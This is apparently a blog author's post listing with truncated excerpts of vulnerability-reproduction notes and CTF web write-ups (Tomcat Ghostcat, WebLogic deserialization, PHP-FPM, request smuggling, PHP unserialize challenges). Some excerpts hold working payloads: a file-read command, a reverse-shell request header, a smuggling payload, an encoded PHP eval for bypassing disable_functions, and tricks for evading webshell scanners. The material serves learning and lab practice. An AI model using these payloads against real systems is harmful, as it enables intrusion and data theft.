- 博客(26)
- 收藏
- 关注
原创 httpproxy+shiro
CVE-2016-5385漏洞产生的原理:有了以上的铺垫,可以大概猜想,如果cgi处理解析后的环境变量时,没有进行安全检查,可能会被黑阔恶意利用。而httpoxy,恰是本次漏洞的切入点。在CGI(RFC 3875)的模式的时候, 会把http头部, 加上HTTP_ 前缀, 注册为环境变量。 如果在Header中发送一个Proxy:xxxxxx, 那么PHP就会把他注册为HTTP_PROXY环境变量,篡改着就可以在该代理服务器上监听这些请求。影响版本:PHP5.6.24版本修复了该漏洞,不会
2022-05-28 17:29:16
294
原创 tomcat
cve-2020-1938Apache Tomcat 6Tomcat 7系列 <7.0.100Tomcat 8系列 < 8.5.51Tomcat 9 系列 <9.0.31读取配置文件python3 /root/桌面/cve-2020-1983/tomcat.py read_file --webapp=manager /WEB-INF/web.xml 192.168.64.142https://github.com/YDHCUI/CNVD-2020-10487-Tomcat
2022-05-28 17:27:52
193
原创 weblogic已复现漏洞
CVE-2017-10271远程代码执行漏洞**漏洞本质:**主要是由于wls组件使用了webservice来请求soap请求,所以通过构造SOAP(XML)格式的请求,在解析的过程中导致XMLDecoder反序列化漏洞,可导致执行任意命令影响版本10.3.6.0, 12.1.3.0, 12.2.1.0, 12.2.1.1 , 12.2.1.2反弹shellPOST /wls-wsat/CoordinatorPortType HTTP/1.1Host: 192.168.64.142:7001U
2022-05-28 17:19:59
406
原创 nginx已复现漏洞
cve-2017-7529原理:nginx在反向代理站点时,通常会将一些文件进行缓存,特别是静态文件,缓存部分存储在文件中,每个缓存文件包括“文件头”+“HTTP返回包头”+“HTTP返回包体”,如果二次请求命中了该缓存文件,则Nginx会直接将该文件中的“HTTP返回包体”返回给用户在请求中包含range头,nginx将会根据指定的start和ed位置返回指定长度内容如果构造两个负位置,如(-600, -9223372036854774591),将会读取到负位置的数据,如果这次请求又命中了缓存文件,
2022-05-28 17:18:31
1485
原创 php已复现漏洞
CVE-2019-11043特定配置的nginx+php-fpm的服务器会存在漏洞如下配置:location ~ [^/]\.php(/|$) { ... fastcgi_split_path_info ^(.+?\.php)(/.*)$; fastcgi_param PATH_INFO $fastcgi_path_info; fastcgi_pass php:9000; ... }可以使用换行符(%0a)来破坏fastcgi_split_path_info指令中的R
2022-05-28 17:15:45
102
原创 httpd已复现漏洞
CVE-2017-15715:2.4.0~2.4.2900截断,后缀名后面加0A,1.php后面加上一个空格,然后双击空格,右边出现hex进制,然后改成0ACVE-2021-41773:目录穿越,Apache httpd Server 2.4.49 版本引入了一个具有路径穿越漏洞的新函数,但需要配合穿越的目录,配置 Require all granted,攻击者可利用该漏洞实现路径穿越从而读取任意文件,或者在配置了cgi的httpd程序中执行bash指令,从而有机会控制服务器。文件读取 payl
2022-05-28 17:14:37
728
原创 HTTP请求走私及其一系列
参考文章:https://www.anquanke.com/post/id/249446https://www.anquanke.com/post/id/220996https://www.anquanke.com/post/id/246516https://paper.seebug.org/1048/HTTP请求走私产生原因在http 1.1中加了keep-Alive和Pipeline知识点1.Content-Length <length>消息的长度,用十进制数字表示
2022-05-28 17:06:36
920
原创 [SUCTF 2019]EasyWeb
知识点:AddType application/x-httpd-php .ahhh//http头添加使得.ahhh当作php脚本解析GIF89a文件头欺骗GIF89a12 12是为了补足8个字节,满足base64编码的规则绕过open_basedir无数字字母webshellpython上传脚本import requestsimport base64htaccess = b"""#define width 1337#define height 1337 AddType ap
2022-05-28 16:57:10
225
原创 [FBCTF2019]RCEService
源码:<?phpputenv('PATH=/home/rceservice/jail');if (isset($_REQUEST['cmd'])) { $json = $_REQUEST['cmd']; if (!is_string($json)) { echo 'Hacking attempt detected<br/><br/>'; } elseif (preg_match('/^.*(alias|bg|bind|break|builtin|
2022-05-28 16:56:12
214
原创 gunicorn 20.0.4 请求走私漏洞
某比赛的一个题,不知道结束没有,就不说名字了gunicorn <= 20.0.4,无论在gunicorn 前使用哪个代理,该漏洞都有效, Http头中的Sec-Websocket-Key: 1会进行特殊解析,从而引发此漏洞/fl4g禁止访问payload:echo -en "GET / HTTP/1.1\r\nHost: localhost\r\nContent-Length: 90\r\nSec-Websocket-Key1: x\r\n\r\nxxxxxxxxGET /fl4g HTT
2022-05-26 20:25:28
1507
原创 phar反序列化学习SWPUCTF2018 SimplePHP
https://xz.aliyun.com/t/3692#toc-13<?phpclass C1e4r{ public $test; public $str; public function __construct($name) { $this->str = $name; } public function __destruct() { $this->test = $this->str;
2022-05-26 20:23:39
193
原创 disable_function_bypass 2019极客大挑战rce_me
取反,可以使用yu师傅的脚本?code=(~%9E%8C%8C%9A%8D%8B)(~%D7%9A%89%9E%93%D7%DB%A0%AF%B0%AC%AB%A4%92%90%9C%97%8A%C8%A2%D6%D6);绕disable_function找可上传的地方上传文件bypass_disablefun_x64.so和bypass_disablefunc.php(重命名为shell.php)然后包含一下shell.phphttp://site.com/bypass_disablefunc
2022-05-26 20:22:17
561
原创 file_get_contonts[ZJCTF 2019]NiZhuanSiWei
<?php $text = $_GET["text"];$file = $_GET["file"];$password = $_GET["password"];if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".file_get_contents($text,'r')."</h1></br>.
2022-05-26 20:18:25
95
原创 badlyserialize
<?phpinclude "waf.php";class NISA{ public $fun="show_me_flag"; public $txw4ever; public function __wakeup() { if($this->fun=="show_me_flag"){ hint(); } } function __call($from,$val){ $thi
2022-05-26 20:14:46
64
原创 [天翼杯 2021]esay_eval
<?phpclass A{ public $code = ""; function __call($method,$args){ eval($this->code); } function __wakeup(){ $this->code = ""; }}class B{ function __destruct(){ echo $this->a->a();
2022-05-26 20:13:46
342
原创 [SUCTF 2018]MultiSQL-MySQL预处理
MySQL传统处理:客户端准备sql语句发送sql语句到MySQL服务器MySQL服务器执行sql语句服务器执行结果返回客户端预处理基本策略:将sql语句强制一分为二:第一部分为前面相同命令和结构部分第二部分为后面可变数据部分首先将前面的sql语句发送给MySQL服务器,让其先执行溢出预处理(并没有真正的执行)第一次发送sql语句的时候将其中可变的数据部分都用一个数据占位符来表示,比如问号?不带参数的预处理准备预处理语句prepare 语句名称 from “预处理的sql
2022-05-26 20:11:07
245
原创 [WUSTCTF 2020]朴实无华
if (isset($_GET['num'])){ //num=1e10,类型转化 $num = $_GET['num']; if(intval($num) < 2020 && intval($num + 1) > 2021){ echo "我不经意间看了看我的劳力士, 不是想看时间, 只是想不经意间, 让你知道我过得比你好.</br>"; }else{ die("金钱解决不了穷人的本质问题").
2022-05-26 20:07:49
243
原创 NSSCTF prize_p5
源码<?phperror_reporting(0); class catalogue{ public $class; public $data; public function __construct() { $this->class = "error"; $this->data = "hacker"; } public function __destruct() { echo
2022-05-26 20:04:24
407
原创 记一次原生类反序列化题
源码: <?phphighlight_file(__FILE__);class a{ public $un0; public $un1; public $un2; public $un3; public $un4; public function __destruct(){ if(!empty($this->un0) && empty($this->un2)){ $th
2022-05-26 20:01:29
109
原创 webshell静态检测的绕过
一句话木马原理:基于_POST,[]等的检测base64编码:$b = base64_encode(‘_POST’);echo $b;echo ‘<br/>’;echo base64_decode($b);gzcompress压缩:$c = gzcompress('_POST');echo $c;echo '<br/>';echo gzuncompress($c);注释:@${$__}[!$_](${$__}[$_]);@$_="s"."s"./*-/*
2022-03-23 19:35:23
3452
原创 常见端口及利用
若有错误请指正文件共享服务端口:端口号端口说明使用说明21,22,69FTP/TFTP文件传输协议允许匿名的上传和下载,爆破和嗅探操作2049NFS服务配置不当139SAMBA服务单爆破,未授权访问,远程代码执行389LDAP目录访问协议注入,允许匿名访问,弱口令远程连接服务端口:22SSH远程连接爆破,SSH隧道及内网代理转发,文件传输23Telnet远程连接爆破,嗅探,弱口令3389RDP远程桌面连接
2022-02-27 17:31:49
505
原创 HTTP请求走私前章---关于http协议的简单学习
若有什么建议和错误还请指出HTTP协议:HTTP是超文本传输协议,是一个基于请求与响应模式的,无状态的,应用层的协议,常基于TCP的连接方式(新手可以理解为传输网页的协议吧233)**无状态:**对于事务处理没有记忆能力,每次的请求都是独立的,它的执行情况和结果与前面的请求和之后的请求是无直接关系的,它不会受前面的请求应答情况直接影响,也不会直接影响后面的请求应答情况HTTP报文:图片来源于https://www.cnblogs.com/klguang/p/4618526.html报文可以b
2022-02-18 13:29:04
258
原创 DNS劫持
均在本地模拟,请不要用于非法途径小白学习,如有错误或者建议还请提出先了解一下dns协议,当然dns也能做隐藏隧道,,,后续写上DNS协议是用来将域名转换为IP地址(也可以将IP地址转换为相应的域名地址)dns劫持:实验环境:Windows10(靶机) 192.168.64.139,kali Linux(攻击机) 192.168.64.133均为NAT模式,保证在同一个网关,能够通信,可以用ping测试(windows默认ping四次,Linux默认一直ping,可以加一个参数 -c 来指定
2022-02-13 22:01:13
3264
1
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人